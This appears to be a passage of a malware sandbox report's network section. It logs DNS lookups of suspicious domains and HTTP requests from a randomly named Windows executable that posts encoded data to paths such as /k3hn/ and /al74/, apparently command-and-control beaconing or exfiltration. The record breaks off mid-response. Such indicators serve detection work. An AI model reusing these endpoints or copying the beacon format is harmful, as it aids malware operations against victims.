Jan 10, 2025 18:51:08.750119925 CET | 192.168.2.4 | 1.1.1.1 | 0xfab7 | Standard query (0) | www.goldbracelet.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:24.618014097 CET | 192.168.2.4 | 1.1.1.1 | 0xb76b | Standard query (0) | www.pku-cs-cjw.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:38.636116982 CET | 192.168.2.4 | 1.1.1.1 | 0x4338 | Standard query (0) | www.ausyva4.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:52.538244963 CET | 192.168.2.4 | 1.1.1.1 | 0xc0fc | Standard query (0) | www.969-usedcar02.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:52:05.757311106 CET | 192.168.2.4 | 1.1.1.1 | 0xd556 | Standard query (0) | www.juewucangku.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:52:19.833429098 CET | 192.168.2.4 | 1.1.1.1 | 0xfa68 | Standard query (0) | www.startsomething.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:52:33.293876886 CET | 192.168.2.4 | 1.1.1.1 | 0x1978 | Standard query (0) | www.opro.vip | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:52:47.319438934 CET | 192.168.2.4 | 1.1.1.1 | 0xcecc | Standard query (0) | www.santillo.bet | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:00.788393974 CET | 192.168.2.4 | 1.1.1.1 | 0x7c4f | Standard query (0) | www.esnafus.online | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:14.679178953 CET | 192.168.2.4 | 1.1.1.1 | 0x1c8 | Standard query (0) | www.sssvip2.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:28.366616964 CET | 192.168.2.4 | 1.1.1.1 | 0x16c9 | Standard query (0) | www.shipley.group | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 18:51:08.949014902 CET | 1.1.1.1 | 192.168.2.4 | 0xfab7 | No error (0) | www.goldbracelet.top | | 104.21.36.239 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:08.949014902 CET | 1.1.1.1 | 192.168.2.4 | 0xfab7 | No error (0) | www.goldbracelet.top | | 172.67.201.49 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:25.185996056 CET | 1.1.1.1 | 192.168.2.4 | 0xb76b | No error (0) | www.pku-cs-cjw.top | 187370.github.io | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:51:25.185996056 CET | 1.1.1.1 | 192.168.2.4 | 0xb76b | No error (0) | 187370.github.io | | 185.199.109.153 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:25.185996056 CET | 1.1.1.1 | 192.168.2.4 | 0xb76b | No error (0) | 187370.github.io | | 185.199.110.153 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:25.185996056 CET | 1.1.1.1 | 192.168.2.4 | 0xb76b | No error (0) | 187370.github.io | | 185.199.111.153 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:25.185996056 CET | 1.1.1.1 | 192.168.2.4 | 0xb76b | No error (0) | 187370.github.io | | 185.199.108.153 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:39.009188890 CET | 1.1.1.1 | 192.168.2.4 | 0x4338 | No error (0) | www.ausyva4.top | | 104.21.48.233 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:39.009188890 CET | 1.1.1.1 | 192.168.2.4 | 0x4338 | No error (0) | www.ausyva4.top | | 172.67.188.88 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:51:52.602622986 CET | 1.1.1.1 | 192.168.2.4 | 0xc0fc | No error (0) | www.969-usedcar02.shop | | 199.59.243.228 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:52:06.198546886 CET | 1.1.1.1 | 192.168.2.4 | 0xd556 | No error (0) | www.juewucangku.xyz | | 8.136.96.106 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:52:19.844885111 CET | 1.1.1.1 | 192.168.2.4 | 0xfa68 | No error (0) | www.startsomething.xyz | | 69.57.163.64 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:52:33.771558046 CET | 1.1.1.1 | 192.168.2.4 | 0x1978 | No error (0) | www.opro.vip | overdue.aliyun.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:52:33.771558046 CET | 1.1.1.1 | 192.168.2.4 | 0x1978 | No error (0) | overdue.aliyun.com | | 170.33.13.246 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:52:47.340240955 CET | 1.1.1.1 | 192.168.2.4 | 0xcecc | No error (0) | www.santillo.bet | santillo.bet | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:52:47.340240955 CET | 1.1.1.1 | 192.168.2.4 | 0xcecc | No error (0) | santillo.bet | | 66.235.200.145 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:01.123945951 CET | 1.1.1.1 | 192.168.2.4 | 0x7c4f | No error (0) | www.esnafus.online | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:53:01.123945951 CET | 1.1.1.1 | 192.168.2.4 | 0x7c4f | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 18:53:01.123945951 CET | 1.1.1.1 | 192.168.2.4 | 0x7c4f | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:14.711869001 CET | 1.1.1.1 | 192.168.2.4 | 0x1c8 | No error (0) | www.sssvip2.shop | | 156.253.8.115 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:28.406824112 CET | 1.1.1.1 | 192.168.2.4 | 0x16c9 | No error (0) | www.shipley.group | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 18:53:28.406824112 CET | 1.1.1.1 | 192.168.2.4 | 0x16c9 | No error (0) | www.shipley.group | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   0 | 192.168.2.4 | 49736 | 104.21.36.239 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:08.970375061 CET | 462 | OUT | GET /3e00/?Ol=yN0LtN-HDTPXX&3h=vcWi2Nuzfs8bFUYHM3WHAx3tRht2hRDvXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhn1cqd0Bfa9GTR6+v7wltgiOCNeedM3Uw1s= HTTP/1.1
                                                                  Host: www.goldbracelet.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                   Jan 10, 2025 18:51:09.574768066 CET | 777 | IN | HTTP/1.1 403 Forbidden
                                                                  Date: Fri, 10 Jan 2025 17:51:09 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vIy347nknzZsF7n8kQFEouund5xCnGKGL9963zsLW7gpdjav5t8iOyZ8SF37shEqquoe%2FXaIjn3y10t4Ff%2FUYfoZXKgmqLu8siwP97th8Rea1qbVS3VG6P8dhfoCvpPz6nxaMgtkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe83741dd843b9-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2262&min_rtt=2262&rtt_var=1131&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=462&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                   Jan 10, 2025 18:51:09.576248884 CET | 157 | IN | Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   1 | 192.168.2.4 | 49737 | 185.199.109.153 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:25.240576029 CET | 728 | OUT | POST /k3hn/ HTTP/1.1
                                                                  Host: www.pku-cs-cjw.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.pku-cs-cjw.top
                                                                  Referer: http://www.pku-cs-cjw.top/k3hn/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Ascii: 3h=Qb19kBUolZZxYYtJN1tIlX99jpodp2BUz+nX0MyLnb33NbWJBMuaKdsK4eZy/jGIToSKxgUdURVHzkjC7I5OrGEnvwiNKT5yo7m6ztnKzJGIFQ2Ur4iBMGilawCBx13tMynYro0GAyy/TV9YbaBPIBtIv5MVVMc5Qm82ATpFYZ9ywN9Bwn2uaHC0LWU4MGYv2g==
                                                                   Jan 10, 2025 18:51:25.763183117 CET | 488 | IN | HTTP/1.1 405 Method Not Allowed
                                                                  Connection: close
                                                                  Content-Length: 131
                                                                  Server: Varnish
                                                                  Retry-After: 0
                                                                  Accept-Ranges: bytes
                                                                  Date: Fri, 10 Jan 2025 17:51:25 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-nyc-kteb1890092-NYC
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1736531486.629736,VS0,VE0
                                                                  X-Fastly-Request-ID: 26b6bd954801d499902934a1fe430e6f3823229f
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   2 | 192.168.2.4 | 49745 | 185.199.109.153 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:27.931122065 CET | 748 | OUT | POST /k3hn/ HTTP/1.1
                                                                  Host: www.pku-cs-cjw.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.pku-cs-cjw.top
                                                                  Referer: http://www.pku-cs-cjw.top/k3hn/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Ascii: 3h=Qb19kBUolZZxa49JMUtIn398vJodjWBQz+rX0JWinpj3O7GJAOWaG9sKsOZz7jGPToesxhodURBHzgnC755PqWElgQiLJj5yo7m6ztjgzJOIGlmUob6eFmikKgCBmF3pMyn2rsVOAwa/TQRYCu1OCBtOwpMLb8BgS35IGz5pYIJW4rwbhWX5IHmHWRdMBFlmtsRy9kq8Pf6mGEPLVPtVCV4=
                                                                   Jan 10, 2025 18:51:28.304838896 CET | 488 | IN | HTTP/1.1 405 Method Not Allowed
                                                                  Connection: close
                                                                  Content-Length: 131
                                                                  Server: Varnish
                                                                  Retry-After: 0
                                                                  Accept-Ranges: bytes
                                                                  Date: Fri, 10 Jan 2025 17:51:28 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-ewr-kewr1740078-EWR
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1736531488.259555,VS0,VE0
                                                                  X-Fastly-Request-ID: 6ad5ae5d9f88c927a5c7f4e84602aa5492b0689b
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   3 | 192.168.2.4 | 49763 | 185.199.109.153 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:30.529994965 CET | 10830 | OUT | POST /k3hn/ HTTP/1.1
                                                                  Host: www.pku-cs-cjw.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.pku-cs-cjw.top
                                                                  Referer: http://www.pku-cs-cjw.top/k3hn/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Ascii: 3h=Qb19kBUolZZxa49JMUtIn398vJodjWBQz+rX0JWinp73OJ+JBp6aIdsKz+Z27jHTToWoxhlgUS5HzDvCs7RPkWEliQiKKT42o722ztTgzJOIGieU84ieDmilawCdx13RMy/ArqJeAA6/UwBYZ9dOfxtMzpNYb8NFSzY5GwlHYI9W7vNf+kXYch2hNSpMYlgnq9dQsHLkaM6vFTqbB8kXfy6XVhTlUfhKXN8MWH8LWKIWCQBYfGw3ZugGjOOEwmZQ15kveUI3UTk117TbfPpGfOkjOOa+GIva4foNNiO9Kezt8gb9iW4h6RmSBypXiuyD79iZOcYYNwoM9wXMNTKpXCZc7/CZ4Cdh2SGh7pgbrUkcbuzBoGgHhOZzl05+6Gl2XyDD3+a94p0GbAIGY4FpL/6fTSZMFvyuG4fQfLMHqwq+F+6rAeJLW73x0mIPdXWrsjTtpuE2WVkNl5NlSfAAQEd4Eeu7awmqjnKmZtZFtd4M89seMYaxl9jo281ne0bLutv+nC8bMTNdIvAmKGJGHecSwnGlF3T01Eyx93xJWN7DsSZcZBNn/gmz6l4vc2R6EDlxDFHNFLlUZKCJEk7TujZy+Z76SCXVR5jHchJdZqxqkZi9QFhyndBkWJ3mpMmprkV+PpiO2b/2kRtxqQufltT0gfD5RxSWhWLxlHTCuEeBUhq5NWrvCrySIL/tfMuyH0J1fRuUt6LfHuft/9CB704BFUi+aOr+ugKkE7ljtyCasnMq8b0oNSGBF52d8uaWDK62biQPDVP191NhX3EUQFhMTaCBfJ3Fnxm8vzBfDe4femSQ6JVJniXwrk2wFxZnlI1QL+ZCkvgyZDl0QB1aWE965XkVZqoF6gX3BBYRw7BlEj97HYiaKo+/IEnV4uHoM/1fQxm8u9D6q9xc5L3gweiCduGvDKqWHdyDtxVmLFRJ3/l5kj1aJCCK5c1ownE6W/YHl0zv2kS6N4zsAq6FxrkIG2WeV9VixjSdgadABvMeW7MjK [TRUNCATED]
                                                                   Jan 10, 2025 18:51:30.963881969 CET | 488 | IN | HTTP/1.1 405 Method Not Allowed
                                                                  Connection: close
                                                                  Content-Length: 131
                                                                  Server: Varnish
                                                                  Retry-After: 0
                                                                  Accept-Ranges: bytes
                                                                  Date: Fri, 10 Jan 2025 17:51:30 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-ewr-kewr1740075-EWR
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1736531491.920835,VS0,VE0
                                                                  X-Fastly-Request-ID: 02f7660282327de081f86e4561557be3514c5bc3
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   4 | 192.168.2.4 | 49781 | 185.199.109.153 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:33.083363056 CET | 460 | OUT | GET /k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81kIy3BeJTiV4odLQ2svXpZKiEE3Qz4K+Ay4=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.pku-cs-cjw.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                   Jan 10, 2025 18:51:33.587296963 CET | 799 | IN | HTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  Content-Length: 162
                                                                  Server: GitHub.com
                                                                  Content-Type: text/html
                                                                  X-GitHub-Request-Id: 69FB:23DB58:ED424C:FF13B3:67815E25
                                                                  Accept-Ranges: bytes
                                                                  Age: 0
                                                                  Date: Fri, 10 Jan 2025 17:51:33 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-ewr-kewr1740058-EWR
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1736531494.530886,VS0,VE11
                                                                  Vary: Accept-Encoding
                                                                  X-Fastly-Request-ID: a39cf2d8f43ae20cd4c13ffc3bf82c2742bbe856
                                                                  Location: http://pku-cs-cjw.top/k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81kIy3BeJTiV4odLQ2svXpZKiEE3Qz4K+Ay4=&Ol=yN0LtN-HDTPXX
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   5 | 192.168.2.4 | 49811 | 104.21.48.233 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:39.032830954 CET | 719 | OUT | POST /al74/ HTTP/1.1
                                                                  Host: www.ausyva4.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.ausyva4.top
                                                                  Referer: http://www.ausyva4.top/al74/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Ascii: 3h=4DLMdNWNjQmPxd1TEjKazfwBnjWxUPhwcTLDU6jBatRAvbvEZHU9r2hccT9rybUD0MGLlnAy16XS+IlSE3THuBIZf7Tocxv4RZ+fuBfvHf7I7GHWI7m5XnHSZZK8Kne+eYfgIN7d5MM2Wg9Cjsnyn7tbPFb865xP3odI2lSq1LxwPBOYYGIKfRxQnftJ+I0A2A==
                                                                   Jan 10, 2025 18:51:39.910972118 CET | 1176 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:51:39 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DdqZy1b9Iu0eSYQrryBoM219Yn3%2FYIQusgeGDqw%2FPThWl6z%2BL2MlvbWu2Voz7JoD%2BZA3v1TAtL0JZobUX49DdyQcC4M8GT6PHiB%2B4PF5QuZBOmFIBQsY33CQMgGpU3MpP8%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe84312dc54328-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=46143&min_rtt=46143&rtt_var=23071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=719&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   6 | 192.168.2.4 | 49824 | 104.21.48.233 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:41.573720932 CET | 739 | OUT | POST /al74/ HTTP/1.1
                                                                  Host: www.ausyva4.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.ausyva4.top
                                                                  Referer: http://www.ausyva4.top/al74/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Ascii: 3h=4DLMdNWNjQmP+fhTBASaiPxz7zWxevg3cS3DU7Waa7JAo6fEXmU9q2hcWz9qtLUK0MCplm8y16TS+I1SDAHAvRIhUbTmfBv4RZ+fuBLVHfjI7y7WJam2L3HRNJK8BHeieYfCIMmK5Pk2WgNCi+Pxp7tZXlaYs8Ahyt4UxFOdwZ12KHDCJ3pdNRVj6Yk9zLJJtGUSEkTv2TmTX5CcrtoMIF8=
                                                                   Jan 10, 2025 18:51:42.298978090 CET | 1161 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:51:42 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AJg1p2ocmgRBzQ9rbfF4RY9zgLdVYL9TVZrmJ17Zv2gCpK%2BNflZ9PdcCY4X6zXU28FlUVD%2FINT0yRmxAUSx2zdcYBcA4p43LZTjElFpUNczrget6kmxHt3o0sm%2BCZtLd3KM%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe84400a37c34d-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=21348&min_rtt=21348&rtt_var=10674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb 65 45 28 21 07 6d 45 a1 6a d1 2d e8 31 6d a6 4d 30 cd 94 ec 6c 97 fd f7 d2 b5 2b 45 f0 92 97 c9 cc f7 98 f0 d4 d5 ec f5 be fc 5c ce e1 b1 7c 5e c0 72 75 b7 78 ba 87 eb 11 e2 d3 bc 7c 40 9c 95 b3 9f ce 64 9c 21 ce 5f ae f5 70 a0 9c ec 43 a7 64 ac 56 e2 25 90 2e b2 02 5e 58 e0 81 eb 68 15 fe 3c 2a ec 46 86 03 b5 66 db 9e 74 43 51 28 69 e5 f2 bf 84 cb b5 c2 73 7b 38 80 77 4e a9 85 2d 27 10 47 e0 e3 86 e3 91 a2 a7 b8 a1 b1 5a 27 d4 c3 c1 32 90 a9 08 12 1d 38 09 88 f3 15 ec a9 aa cc 8e c0 44 7b 62 42 6d a9 e3 b7 1c 02 37 3e ee c0 c7 2d a7 bd 11 cf 11 84 a1 ae 7a b7 d2 99 f8 05 2d d7 70 a4 d4 c2 be de b8 2b 85 87 d3 d2 62 d6 81 ba 4b ea 4e ab 57 6f 8b a9 42 b1 e7 d2 89 1c a6 88 4d d3 8c 4d 5d b5 47 53 8c 85 0f 68 c2 6d 81 fd 18 9e e1 de e2 9d d2 91 d2 a5 4b a8 d9 fa 96 46 a6 a9 46 91 2d e5 ff a1 33 23 74 09 4e b2 c9 0d 66 39 e6 39 64 f9 f4 26 9f 16 93 3f 28 fe 7e c1 25 d4 4b 6e 28 91 85 75 0b 1f ca 25 dd a7 22 14 [TRUNCATED]
                                                                  Data Ascii: 161uAK1{;eE(!mEj-1mM0l+E\|^rux|@d!_pCdV%.^Xh<*FftCQ(is{8wN-'GZ'28D{bBm7>-z-p+bKNWoBMM]GShmKFF-3#tNf99d&?(~%Kn(u%"w>E7J10


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   7 | 192.168.2.4 | 49835 | 104.21.48.233 | 80 | 1780 | C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Jan 10, 2025 18:51:44.234657049 CET | 10821 | OUT | POST /al74/ HTTP/1.1
                                                                  Host: www.ausyva4.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.ausyva4.top
                                                                  Referer: http://www.ausyva4.top/al74/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 2b 66 68 54 42 41 53 61 69 50 78 7a 37 7a 57 78 65 76 67 33 63 53 33 44 55 37 57 61 61 37 42 41 76 4d 4c 45 58 42 34 39 34 6d 68 63 56 7a 39 33 74 4c 56 59 30 4b 71 74 6c 6d 77 49 31 34 62 53 2b 71 4e 53 43 31 72 41 68 52 49 68 62 37 54 6e 63 78 75 77 52 64 6a 57 75 42 62 56 48 66 6a 49 37 7a 72 57 4f 4c 6d 32 62 48 48 53 5a 5a 4b 47 4b 6e 65 47 65 63 37 34 49 4d 6a 33 6c 75 45 32 57 41 64 43 67 4c 54 78 32 4c 74 66 43 6c 61 41 73 38 45 69 79 70 59 59 78 47 54 4b 77 62 70 32 49 52 4b 69 51 33 6b 46 62 53 64 35 74 66 34 46 77 38 5a 46 70 68 41 4b 44 42 7a 4c 71 79 4c 2f 63 62 62 76 32 64 38 6d 64 77 67 62 68 4a 65 79 6d 70 68 6e 69 6e 71 78 57 73 33 53 74 76 6e 42 72 6d 64 53 58 69 59 49 49 52 46 38 78 69 62 56 70 71 69 51 41 65 51 30 78 76 2b 50 74 39 30 77 63 5a 54 74 46 4e 4a 63 2f 31 6e 6b 75 4f 43 4a 39 6c 74 46 45 39 34 76 69 32 46 4f 74 45 38 4b 38 54 78 44 55 72 49 58 51 34 61 72 58 48 2f 6e 2b 64 70 48 69 42 47 62 66 50 49 30 6b 78 2b 48 42 48 50 [TRUNCATED]
                                                                   Data Ascii: 3h= [TRUNCATED]
                                                                   Jan 10, 2025 18:51:44.929955006 CET | 1166 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:51:44 GMT
                                                                  Content-Type: text/html
